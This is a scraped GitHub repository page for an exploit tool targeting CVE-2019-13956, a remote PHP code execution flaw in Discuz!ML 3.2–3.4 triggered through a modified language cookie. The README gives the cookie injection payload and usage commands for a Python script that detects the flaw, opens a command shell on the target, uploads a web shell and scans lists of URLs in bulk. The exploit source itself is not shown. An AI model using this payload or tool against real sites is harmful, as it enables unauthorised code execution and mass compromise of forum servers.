GitHub

Discuz ML RCE
CVE ID : CVE-2019-13956
URL: https://www.esoln.net/blog/2019/06/14/discuzml-v-3-x-code-injection-vulnerability/
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2019-13956
CVE Mitre : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13956

Discuz!ML 3.2 through 3.4 allows remote attackers to execute arbitrary PHP code via a modified language cookie, as demonstrated by changing 4gH4_0df5_language=en to 4gH4_0df5_language=en'.phpinfo().'; (if the random prefix 4gH4_0df5_ were used).

Installation

python2.7
pip -r requirements.txt

Help

python discuz_mlRce.py -h

Vulnerability Detection

python discuz_mlRce.py -u "http://www.example.cn/forum.php"

GETTING Command Shell

python discuz_mlRce.py -u "http://www.example.cn/forum.php" --cmdshell

GETTING Shell URL

python ddiscuz_mlRce.py -u "http://www.example.cn/forum.php" --getshell

Scanning List of URL

python discuz_mlRce.py -f urls.txt

Name		Name	Last commit message	Last commit date
Latest commit History 7 Commits
LICENSE		LICENSE
README.md		README.md
discuz_mlRce.py		discuz_mlRce.py
requirements.txt		requirements.txt
urls.txt		urls.txt

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

LICENSE

LICENSE

README.md

README.md

discuz_mlRce.py

discuz_mlRce.py

requirements.txt

requirements.txt

urls.txt

urls.txt

Repository files navigation

About

Releases

Packages

Languages

License

Jungl3b00k/Discuz_RCE

Folders and files

Latest commit

History

Repository files navigation

About

Topics

Resources

License

Stars

Watchers

Forks

Languages